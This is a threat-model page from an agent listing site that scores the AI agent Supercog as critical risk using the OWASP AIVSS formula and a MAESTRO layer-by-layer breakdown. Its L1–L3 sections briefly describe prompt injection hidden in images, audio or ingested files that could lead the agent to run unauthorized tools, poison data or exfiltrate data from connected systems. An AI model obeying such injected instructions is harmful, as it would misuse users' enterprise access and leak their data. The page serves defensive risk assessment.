AgentReadyHomeAgent Listing

← Supercog

Supercog — agentic threat model

9.6AIVSS 9.6 · Critical

Supercog presents a high agentic risk due to its capability to connect to arbitrary enterprise systems, read any file type, and take actions on behalf of users, combined with a lack of explicit security controls or sandboxing mentioned in its public listing.

OWASP AIVSS score rationale

AIVSS = (CVSS_Base + AARS) × Mitigation_Factor, where AARS = (10 − CVSS_Base) × (Factor_Sum / 10) × ThM
CVSS base 8.8AARS uplift 0.77Factor sum 5.8/10Threat ×1.1Mitigation ×1.0
Autonomy of Action
0.80
Goal-Driven Planning
0.70
Self-Modification
0.10
Dynamic Tool Use
0.90
Persistent Memory
0.40
Contextual Awareness
0.80
Dynamic Identity
0.60
Multi-Agent Interactions
0.20
Non-Determinism
0.70
Opacity & Reflexivity
0.60

Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.

MAESTRO 7-layer threat model

Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.

L1 · Foundation Models✓ mapped

Supports all leading multi-modal LLMs (text, vision, audio, video). The primary threat is multi-modal prompt injection (e.g., malicious instructions embedded in images, audio, or files) leading to model reprogramming and unauthorized tool execution.

L2 · Data Operations✓ mapped

Processes 'any kind of file' and connects to work systems. This introduces severe risks of data poisoning, indirect prompt injection via ingested documents, and unauthorized data exfiltration from connected databases or file repositories.

L3 · Agent Frameworks✓ mapped

Orchestrates actions across connected work systems. The main threat is tool misuse and insecure tool integration, where the agent is manipulated into executing unintended API calls or write actions on external systems.

L4 · Deployment & Infrastructure⚠ not certain from listing

Not certain from the listing — available as cloud-hosted or self-hosted, but details regarding container sandboxing for file processing, network isolation, or secure credential storage for system connectors are not specified.

L5 · Evaluation & Observability⚠ not certain from listing

Not certain from the listing — there is no mention of built-in guardrails, transaction monitoring, or execution logging to detect anomalous agent behavior or drift before actions are committed to external systems.

L6 · Security & Compliance (cross-cutting)⚠ not certain from listing

Not certain from the listing — although it acts on behalf of users across enterprise systems, the listing does not detail how user identity is propagated, whether RBAC is enforced, or if any compliance standards (e.g., SOC2) are met.

L7 · Agent Ecosystem⚠ not certain from listing

Not certain from the listing — there is no explicit mention of multi-agent collaboration or marketplace integrations, though its extensibility suggests potential for custom agent-to-agent workflows.

MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).